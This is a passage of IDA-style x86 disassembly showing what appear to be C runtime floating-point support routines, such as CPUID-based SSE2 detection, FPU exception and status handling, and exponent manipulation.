loc_40F669: ; CODE XREF: sub_40F524+13A�j
or [ebp+arg_8], 40000h
jmp short loc_40F6A3
; ---------------------------------------------------------------------------
loc_40F672: ; CODE XREF: sub_40F524+DF�j
; sub_40F524+E7�j ...
mov eax, ds:dword_42648C
cmp eax, esi
jz short loc_40F6A3
push eax
call sub_405193
pop ecx
call eax
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_40F6A3
mov eax, ds:dword_426490
cmp eax, esi
jz short loc_40F6A3
push [ebp+var_4]
push eax
call sub_405193
pop ecx
call eax
mov [ebp+var_4], eax
loc_40F6A3: ; CODE XREF: sub_40F524+143�j
; sub_40F524+14C�j ...
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_4]
push ds:dword_426488
call sub_405193
pop ecx
call eax
loc_40F6BD: ; CODE XREF: sub_40F524+3B�j
pop edi
pop esi
pop ebx
leave
retn
sub_40F524 endp
; =============== S U B R O U T I N E =======================================
sub_40F6C2 proc near ; CODE XREF: sub_409AB4+27�p
; sub_409AB4+38�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jl short loc_40F6EB
cmp ecx, 2
jle short loc_40F6DE
cmp ecx, 3
jnz short loc_40F6EB
mov eax, ds:dword_425A9C
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F6DE: ; CODE XREF: sub_40F6C2+E�j
mov eax, ds:dword_425A9C
mov ds:dword_425A9C, ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F6EB: ; CODE XREF: sub_40F6C2+9�j
; sub_40F6C2+13�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
sub_40F6C2 endp
; =============== S U B R O U T I N E =======================================
sub_40F708 proc near ; CODE XREF: sub_40FD56+5F�p
; DATA XREF: sub_40A42B:loc_40A46D�o
xor eax, eax
retn
sub_40F708 endp
; =============== S U B R O U T I N E =======================================
sub_40F70B proc near ; CODE XREF: sub_40F76B�p
mov eax, offset sub_41134A
mov ds:off_423F80, eax
mov ds:off_423F84, offset sub_410A46
mov ds:off_423F88, offset sub_410A04
mov ds:off_423F8C, offset sub_410A38
mov ds:off_423F90, offset word_4109AE
mov ds:off_423F94, eax
mov ds:off_423F98, offset sub_4112C4
mov ds:off_423F9C, offset sub_4109C4
mov ds:off_423FA0, offset sub_41092E
mov ds:off_423FA4, offset sub_4108BD
retn
sub_40F70B endp
; =============== S U B R O U T I N E =======================================
sub_40F76B proc near ; CODE XREF: sub_407979+1C�p
; DATA XREF: seg001:off_41ED94�o
arg_0 = dword ptr 4
call sub_40F70B
call sub_4113D0
cmp [esp+arg_0], 0
mov ds:dword_4264A0, eax
jz short loc_40F786
call sub_41136B
loc_40F786: ; CODE XREF: sub_40F76B+14�j
fnclex
retn
sub_40F76B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F789 proc near ; CODE XREF: sub_40F7D9+4D�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_4218E8
call __SEH_prolog4
and [ebp+ms_exc.disabled], 0
movapd xmm0, xmm1
mov [ebp+var_1C], 1
jmp short loc_40F7C9
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0C0000005h
jz short loc_40F7BE
cmp eax, 0C000001Dh
jz short loc_40F7BE
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40F7BE: ; CODE XREF: sub_40F789+29�j
; sub_40F789+30�j
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
and [ebp+var_1C], 0
loc_40F7C9: ; CODE XREF: sub_40F789+1B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40F789 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F7D9 proc near ; CODE XREF: sub_40A6DB+7�p sub_40F839�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
xor eax, eax
push ebx
mov [ebp+var_4], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
push ebx
pushf
pop eax
mov ecx, eax
xor eax, 200000h
push eax
popf
pushf
pop edx
sub edx, ecx
jz short loc_40F81C
push ecx
popf
xor eax, eax
cpuid
mov [ebp+var_C], eax
mov [ebp+var_18], ebx
mov [ebp+var_14], edx
mov [ebp+var_10], ecx
mov eax, 1
cpuid
mov [ebp+var_4], edx
mov [ebp+var_8], eax
loc_40F81C: ; CODE XREF: sub_40F7D9+22�j
pop ebx
test [ebp+var_4], 4000000h
jz short loc_40F834
call sub_40F789
test eax, eax
jz short loc_40F834
xor eax, eax
inc eax
jmp short loc_40F836
; ---------------------------------------------------------------------------
loc_40F834: ; CODE XREF: sub_40F7D9+4B�j
; sub_40F7D9+54�j
xor eax, eax
loc_40F836: ; CODE XREF: sub_40F7D9+59�j
pop ebx
leave
retn
sub_40F7D9 endp
; =============== S U B R O U T I N E =======================================
sub_40F839 proc near ; DATA XREF: seg001:0041D2D0�o
call sub_40F7D9
mov ds:dword_433C7C, eax
xor eax, eax
retn
sub_40F839 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F846 proc near ; CODE XREF: sub_40FE47+4A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov cl, byte ptr [ebp+arg_8]
push ebx
push esi
push edi
xor edi, edi
mov [eax+4], edi
mov eax, [ebp+arg_0]
xor ebx, ebx
mov [eax+8], edi
mov eax, [ebp+arg_0]
inc ebx
test cl, 10h
mov [eax+0Ch], edi
jz short loc_40F878
mov eax, [ebp+arg_0]
or [eax+4], ebx
mov [ebp+arg_8], 0C000008Fh
loc_40F878: ; CODE XREF: sub_40F846+23�j
test cl, 2
jz short loc_40F88B
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 2
mov [ebp+arg_8], 0C0000093h
loc_40F88B: ; CODE XREF: sub_40F846+35�j
test cl, bl
jz short loc_40F89D
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 4
mov [ebp+arg_8], 0C0000091h
loc_40F89D: ; CODE XREF: sub_40F846+47�j
test cl, 4
jz short loc_40F8B0
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 8
mov [ebp+arg_8], 0C000008Eh
loc_40F8B0: ; CODE XREF: sub_40F846+5A�j
test cl, 8
jz short loc_40F8C3
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 10h
mov [ebp+arg_8], 0C0000090h
loc_40F8C3: ; CODE XREF: sub_40F846+6D�j
mov esi, [ebp+arg_4]
mov ecx, [esi]
mov eax, [ebp+arg_0]
shl ecx, 4
not ecx
xor ecx, [eax+8]
and ecx, 10h
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
add ecx, ecx
not ecx
xor ecx, [eax+8]
and ecx, 8
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 1
not ecx
xor ecx, [eax+8]
and ecx, 4
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 3
not ecx
xor ecx, [eax+8]
and ecx, 2
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 5
not ecx
xor ecx, [eax+8]
and ecx, ebx
xor [eax+8], ecx
call sub_410046
test al, bl
jz short loc_40F932
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_40F932: ; CODE XREF: sub_40F846+E3�j
test al, 4
jz short loc_40F93D
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_40F93D: ; CODE XREF: sub_40F846+EE�j
test al, 8
jz short loc_40F948
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_40F948: ; CODE XREF: sub_40F846+F9�j
test al, 10h
jz short loc_40F953
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 2
loc_40F953: ; CODE XREF: sub_40F846+104�j
test al, 20h
jz short loc_40F95D
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_40F95D: ; CODE XREF: sub_40F846+10F�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_40F99D
cmp eax, 400h
jz short loc_40F991
cmp eax, 800h
jz short loc_40F982
cmp eax, ecx
jnz short loc_40F9A3
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_40F9A3
; ---------------------------------------------------------------------------
loc_40F982: ; CODE XREF: sub_40F846+12E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, 2
loc_40F98D: ; CODE XREF: sub_40F846+155�j
mov [eax], ecx
jmp short loc_40F9A3
; ---------------------------------------------------------------------------
loc_40F991: ; CODE XREF: sub_40F846+127�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
jmp short loc_40F98D
; ---------------------------------------------------------------------------
loc_40F99D: ; CODE XREF: sub_40F846+120�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_40F9A3: ; CODE XREF: sub_40F846+132�j
; sub_40F846+13A�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_40F9CE
cmp eax, 200h
jz short loc_40F9C1
cmp eax, ecx
jnz short loc_40F9DB
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_40F9DB
; ---------------------------------------------------------------------------
loc_40F9C1: ; CODE XREF: sub_40F846+16D�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_40F9D9
; ---------------------------------------------------------------------------
loc_40F9CE: ; CODE XREF: sub_40F846+166�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_40F9D9: ; CODE XREF: sub_40F846+186�j
mov [eax], ecx
loc_40F9DB: ; CODE XREF: sub_40F846+171�j
; sub_40F846+179�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
shl ecx, 5
xor ecx, [eax]
and ecx, 1FFE0h
xor [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
cmp [ebp+arg_18], edi
mov eax, [ebp+arg_0]
mov edi, [ebp+arg_14]
jz short loc_40FA25
and dword ptr [eax+20h], 0FFFFFFE1h
mov eax, [ebp+arg_10]
fld dword ptr [eax]
mov eax, [ebp+arg_0]
fstp dword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+60h], ebx
mov eax, [ebp+arg_0]
and dword ptr [eax+60h], 0FFFFFFE1h
fld dword ptr [edi]
mov eax, [ebp+arg_0]
fstp dword ptr [eax+50h]
jmp short loc_40FA59
; ---------------------------------------------------------------------------
loc_40FA25: ; CODE XREF: sub_40F846+1B7�j
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, 2
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+60h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+60h]
and ecx, 0FFFFFFE3h
or ecx, 2
mov [eax+60h], ecx
fld qword ptr [edi]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+50h]
loc_40FA59: ; CODE XREF: sub_40F846+1DD�j
call sub_410051
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call ds:dword_41D1AC
mov ecx, [ebp+arg_0]
test byte ptr [ecx+8], 10h
jz short loc_40FA7A
and dword ptr [esi], 0FFFFFFFEh
loc_40FA7A: ; CODE XREF: sub_40F846+22F�j
test byte ptr [ecx+8], 8
jz short loc_40FA83
and dword ptr [esi], 0FFFFFFFBh
loc_40FA83: ; CODE XREF: sub_40F846+238�j
test byte ptr [ecx+8], 4
jz short loc_40FA8C
and dword ptr [esi], 0FFFFFFF7h
loc_40FA8C: ; CODE XREF: sub_40F846+241�j
test byte ptr [ecx+8], 2
jz short loc_40FA95
and dword ptr [esi], 0FFFFFFEFh
loc_40FA95: ; CODE XREF: sub_40F846+24A�j
test [ecx+8], bl
jz short loc_40FA9D
and dword ptr [esi], 0FFFFFFDFh
loc_40FA9D: ; CODE XREF: sub_40F846+252�j
mov eax, [ecx]
and eax, 3
xor ebx, ebx
sub eax, ebx
mov edx, 0FFFFF3FFh
jz short loc_40FADC
dec eax
jz short loc_40FACE
dec eax
jz short loc_40FABE
dec eax
jnz short loc_40FADE
or dword ptr [esi], 0C00h
jmp short loc_40FADE
; ---------------------------------------------------------------------------
loc_40FABE: ; CODE XREF: sub_40F846+26B�j
mov eax, [esi]
and eax, 0FFFFFBFFh
or eax, 800h
loc_40FACA: ; CODE XREF: sub_40F846+294�j
mov [esi], eax
jmp short loc_40FADE
; ---------------------------------------------------------------------------
loc_40FACE: ; CODE XREF: sub_40F846+268�j
mov eax, [esi]
and eax, 0FFFFF7FFh
or eax, 400h
jmp short loc_40FACA
; ---------------------------------------------------------------------------
loc_40FADC: ; CODE XREF: sub_40F846+265�j
and [esi], edx
loc_40FADE: ; CODE XREF: sub_40F846+26E�j
; sub_40F846+276�j ...
mov eax, [ecx]
shr eax, 2
and eax, 7
sub eax, ebx
jz short loc_40FAFF
dec eax
jz short loc_40FAF4
dec eax
jnz short loc_40FB0A
and [esi], edx
jmp short loc_40FB0A
; ---------------------------------------------------------------------------
loc_40FAF4: ; CODE XREF: sub_40F846+2A5�j
mov eax, [esi]
and eax, edx
or eax, 200h
jmp short loc_40FB08
; ---------------------------------------------------------------------------
loc_40FAFF: ; CODE XREF: sub_40F846+2A2�j
mov eax, [esi]
and eax, edx
or eax, 300h
loc_40FB08: ; CODE XREF: sub_40F846+2B7�j
mov [esi], eax
loc_40FB0A: ; CODE XREF: sub_40F846+2A8�j
; sub_40F846+2AC�j
cmp [ebp+arg_18], ebx
jz short loc_40FB16
fld dword ptr [ecx+50h]
fstp dword ptr [edi]
jmp short loc_40FB1B
; ---------------------------------------------------------------------------
loc_40FB16: ; CODE XREF: sub_40F846+2C7�j
fld qword ptr [ecx+50h]
fstp qword ptr [edi]
loc_40FB1B: ; CODE XREF: sub_40F846+2CE�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40F846 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FB20 proc near ; CODE XREF: sub_40FE47+21�p
var_28 = qword ptr -28h
var_10 = qword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
xor ebx, ebx
mov esi, eax
and esi, 1Fh
inc ebx
test al, 8
mov [ebp+var_4], esi
jz short loc_40FB4E
test byte ptr [ebp+arg_8], bl
jz short loc_40FB4E
push ebx
call sub_410084
pop ecx
and esi, 0FFFFFFF7h
jmp loc_40FCDF
; ---------------------------------------------------------------------------
loc_40FB4E: ; CODE XREF: sub_40FB20+18�j
; sub_40FB20+1D�j
test al, 4
jz short loc_40FB68
test byte ptr [ebp+arg_8], 4
jz short loc_40FB68
push 4
call sub_410084
pop ecx
and esi, 0FFFFFFFBh
jmp loc_40FCDF
; ---------------------------------------------------------------------------
loc_40FB68: ; CODE XREF: sub_40FB20+30�j
; sub_40FB20+36�j
test al, bl
jz loc_40FC0A
test byte ptr [ebp+arg_8], 8
jz loc_40FC0A
push 8
call sub_410084
mov eax, [ebp+arg_8]
pop ecx
mov ecx, 0C00h
and eax, ecx
jz short loc_40FBE2
cmp eax, 400h
jz short loc_40FBCC
cmp eax, 800h
jz short loc_40FBB6
cmp eax, ecx
jnz short loc_40FC02
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
fld ds:dbl_4240C8
test ah, 5
jnp short loc_40FC00
jmp short loc_40FBFE
; ---------------------------------------------------------------------------
loc_40FBB6: ; CODE XREF: sub_40FB20+7A�j
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jnp short loc_40FBF0
fld ds:dbl_4240C8
jmp short loc_40FBFE
; ---------------------------------------------------------------------------
loc_40FBCC: ; CODE XREF: sub_40FB20+73�j
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jp short loc_40FBF8
fld ds:dbl_4240C8
jmp short loc_40FC00
; ---------------------------------------------------------------------------
loc_40FBE2: ; CODE XREF: sub_40FB20+6C�j
fldz
mov ecx, [ebp+arg_4]
fcomp qword ptr [ecx]
fnstsw ax
test ah, 5
jp short loc_40FBF8
loc_40FBF0: ; CODE XREF: sub_40FB20+A2�j
fld ds:dbl_4240B8
jmp short loc_40FC00
; ---------------------------------------------------------------------------
loc_40FBF8: ; CODE XREF: sub_40FB20+B8�j
; sub_40FB20+CE�j
fld ds:dbl_4240B8
loc_40FBFE: ; CODE XREF: sub_40FB20+94�j
; sub_40FB20+AA�j
fchs
loc_40FC00: ; CODE XREF: sub_40FB20+92�j
; sub_40FB20+C0�j ...
fstp qword ptr [ecx]
loc_40FC02: ; CODE XREF: sub_40FB20+7E�j
and esi, 0FFFFFFFEh
jmp loc_40FCDF
; ---------------------------------------------------------------------------
loc_40FC0A: ; CODE XREF: sub_40FB20+4A�j
; sub_40FB20+54�j
test al, 2
jz loc_40FCDF
test byte ptr [ebp+arg_8], 10h
jz loc_40FCDF
xor esi, esi
test al, 10h
jz short loc_40FC24
mov esi, ebx
loc_40FC24: ; CODE XREF: sub_40FB20+100�j
fldz
push edi
mov edi, [ebp+arg_4]
fcomp qword ptr [edi]
fnstsw ax
test ah, 44h
jnp loc_40FCC9
fld qword ptr [edi]
lea eax, [ebp+var_8]
push eax ; int
push ecx
push ecx ; double
fstp [esp+28h+var_28]
call sub_40FF97
mov ecx, [ebp+var_8]
fstp [ebp+var_10]
add ecx, 0FFFFFA00h
add esp, 0Ch
cmp ecx, 0FFFFFBCEh
jge short loc_40FC6B
fld [ebp+var_10]
mov esi, ebx
fmul ds:dbl_41EE18
jmp short loc_40FCBF
; ---------------------------------------------------------------------------
loc_40FC6B: ; CODE XREF: sub_40FB20+13C�j
fldz
fcomp [ebp+var_10]
fnstsw ax
test ah, 41h
jnz short loc_40FC7B
mov edx, ebx
jmp short loc_40FC7D
; ---------------------------------------------------------------------------
loc_40FC7B: ; CODE XREF: sub_40FB20+155�j
xor edx, edx
loc_40FC7D: ; CODE XREF: sub_40FB20+159�j
movzx eax, byte ptr [ebp+var_10+6]
and eax, 0Fh
or eax, 10h
mov word ptr [ebp+var_10+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_40FCB6
sub eax, ecx
loc_40FC96: ; CODE XREF: sub_40FB20+194�j
test byte ptr [ebp+var_10], bl
jz short loc_40FCA1
test esi, esi
jnz short loc_40FCA1
mov esi, ebx
loc_40FCA1: ; CODE XREF: sub_40FB20+179�j
; sub_40FB20+17D�j
shr dword ptr [ebp+var_10], 1
test byte ptr [ebp+var_10+4], bl
jz short loc_40FCB0
or dword ptr [ebp+var_10], 80000000h
loc_40FCB0: ; CODE XREF: sub_40FB20+187�j
shr dword ptr [ebp+var_10+4], 1
dec eax
jnz short loc_40FC96
loc_40FCB6: ; CODE XREF: sub_40FB20+172�j
test edx, edx
jz short loc_40FCC2
fld [ebp+var_10]
fchs
loc_40FCBF: ; CODE XREF: sub_40FB20+149�j
fstp [ebp+var_10]
loc_40FCC2: ; CODE XREF: sub_40FB20+198�j
fld [ebp+var_10]
fstp qword ptr [edi]
jmp short loc_40FCCB
; ---------------------------------------------------------------------------
loc_40FCC9: ; CODE XREF: sub_40FB20+111�j
mov esi, ebx
loc_40FCCB: ; CODE XREF: sub_40FB20+1A7�j
test esi, esi
pop edi
jz short loc_40FCD8
push 10h
call sub_410084
pop ecx
loc_40FCD8: ; CODE XREF: sub_40FB20+1AE�j
and [ebp+var_4], 0FFFFFFFDh
mov esi, [ebp+var_4]
loc_40FCDF: ; CODE XREF: sub_40FB20+29�j
; sub_40FB20+43�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_40FCF6
test byte ptr [ebp+arg_8], 20h
jz short loc_40FCF6
push 20h
call sub_410084
pop ecx
and esi, 0FFFFFFEFh
loc_40FCF6: ; CODE XREF: sub_40FB20+1C3�j
; sub_40FB20+1C9�j
xor eax, eax
test esi, esi
pop esi
setz al
pop ebx
leave
retn
sub_40FB20 endp
; =============== S U B R O U T I N E =======================================
sub_40FD01 proc near ; CODE XREF: sub_40FD56+6C�p
; sub_40FD56+91�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_40FD1D
jle short locret_40FD28
cmp eax, 3
jg short locret_40FD28
call sub_4057D3
mov dword ptr [eax], 22h
retn
; ---------------------------------------------------------------------------
loc_40FD1D: ; CODE XREF: sub_40FD01+7�j
call sub_4057D3
mov dword ptr [eax], 21h
locret_40FD28: ; CODE XREF: sub_40FD01+9�j
; sub_40FD01+E�j
retn
sub_40FD01 endp
; =============== S U B R O U T I N E =======================================
sub_40FD29 proc near ; CODE XREF: sub_40FE47+55�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_40FD35
push 5
jmp short loc_40FD4B
; ---------------------------------------------------------------------------
loc_40FD35: ; CODE XREF: sub_40FD29+6�j
test al, 8
jz short loc_40FD3D
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40FD3D: ; CODE XREF: sub_40FD29+E�j
test al, 4
jz short loc_40FD45
push 2
jmp short loc_40FD4B
; ---------------------------------------------------------------------------
loc_40FD45: ; CODE XREF: sub_40FD29+16�j
test al, 1
jz short loc_40FD4D
push 3
loc_40FD4B: ; CODE XREF: sub_40FD29+A�j
; sub_40FD29+1A�j
pop eax
retn
; ---------------------------------------------------------------------------
loc_40FD4D: ; CODE XREF: sub_40FD29+1E�j
movzx eax, al
and eax, 2
add eax, eax
retn
sub_40FD29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FD56(int,int,int,int,int,int,double,int)
sub_40FD56 proc near ; CODE XREF: sub_40FDF4+2A�p
; sub_40FE47+87�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
xor eax, eax
loc_40FD5E: ; CODE XREF: sub_40FD56+18�j
mov ecx, ds:dword_423FD0[eax*8]
cmp ecx, [ebp+arg_4]
jz short loc_40FDCE
inc eax
cmp eax, 1Dh
jl short loc_40FD5E
xor eax, eax
loc_40FD72: ; CODE XREF: sub_40FD56+7F�j
test eax, eax
mov [ebp+var_1C], eax
jz short loc_40FDD7
mov eax, [ebp+arg_8]
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8+4], eax
call sub_41005D
lea eax, [ebp+var_20]
push eax
call sub_40F708
add esp, 0Ch
test eax, eax
jnz short loc_40FDC8
push esi
call sub_40FD01
pop ecx
loc_40FDC8: ; CODE XREF: sub_40FD56+69�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40FDCE: ; CODE XREF: sub_40FD56+12�j
mov eax, ds:off_423FD4[eax*8]
jmp short loc_40FD72
; ---------------------------------------------------------------------------
loc_40FDD7: ; CODE XREF: sub_40FD56+21�j
push 0FFFFh
push [ebp+arg_20]
call sub_41005D
push [ebp+arg_0]
call sub_40FD01
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_40FD56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FDF4(int,double,int)
sub_40FDF4 proc near ; CODE XREF: sub_40A6EF+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = qword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:dword_423FC0, 0
jnz short loc_40FE28
push [ebp+arg_C] ; int
fld [ebp+arg_4]
sub esp, 18h
fstp [esp+1Ch+var_C]
fldz
fstp [esp+1Ch+var_14]
fld [ebp+arg_4]
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_40FD56
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FE28: ; CODE XREF: sub_40FDF4+A�j
call sub_4057D3
push 0FFFFh
push [ebp+arg_C]
mov dword ptr [eax], 21h
call sub_41005D
fld [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_40FDF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FE47(int,int,double,double,int)
sub_40FE47 proc near ; CODE XREF: sub_40A6EF:loc_40A7B4�p
var_9C = qword ptr -9Ch
var_94 = qword ptr -94h
var_8C = qword ptr -8Ch
var_84 = dword ptr -84h
var_80 = byte ptr -80h
var_40 = dword ptr -40h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 80h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+80h+var_4], eax
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_40FB20
add esp, 0Ch
test eax, eax
jnz short loc_40FE99
and [esp+80h+var_40], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_18]
push [ebp+arg_0]
push eax
lea eax, [esp+98h+var_80]
push eax
call sub_40F846
add esp, 1Ch
loc_40FE99: ; CODE XREF: sub_40FE47+2B�j
push [ebp+arg_0]
call sub_40FD29
add esp, 4
cmp ds:dword_423FC0, 0
jnz short loc_40FED8
test eax, eax
jz short loc_40FED8
push [ebp+arg_18] ; int
fld [ebp+arg_10]
sub esp, 18h
fstp [esp+9Ch+var_8C]
fldz
fstp [esp+9Ch+var_94]
fld [ebp+arg_8]
fstp [esp+9Ch+var_9C]
push [ebp+arg_4] ; int
push eax ; int
call sub_40FD56
add esp, 24h
jmp short loc_40FEF2
; ---------------------------------------------------------------------------
loc_40FED8: ; CODE XREF: sub_40FE47+64�j
; sub_40FE47+68�j
push eax
call sub_40FD01
mov [esp+84h+var_84], 0FFFFh
push [ebp+arg_18]
call sub_41005D
fld [ebp+arg_10]
pop ecx
pop ecx
loc_40FEF2: ; CODE XREF: sub_40FE47+8F�j
mov ecx, [esp+80h+var_4]
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn
sub_40FE47 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40FF01(double)
sub_40FF01 proc near ; CODE XREF: sub_40A6EF:loc_40A775�p
var_8 = qword ptr -8
arg_0 = qword ptr 4
push ecx
push ecx
fld [esp+8+arg_0]
frndint
fstp [esp+8+var_8]
fld [esp+8+var_8]
pop ecx
pop ecx
retn
sub_40FF01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FF12(double,int)
sub_40FF12 proc near ; CODE XREF: sub_40FF97+79�p
; sub_40FF97+8E�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
fld [ebp+arg_0]
mov ecx, dword ptr [ebp+arg_0+6]
fstp [ebp+var_8]
add eax, 3FEh
shl eax, 4
and ecx, 0FFFF800Fh
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_40FF12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FF3C proc near ; CODE XREF: sub_40A6EF+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_40FF54
cmp [ebp+arg_0], edx
jnz short loc_40FF67
xor eax, eax
inc eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FF54: ; CODE XREF: sub_40FF3C+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_40FF67
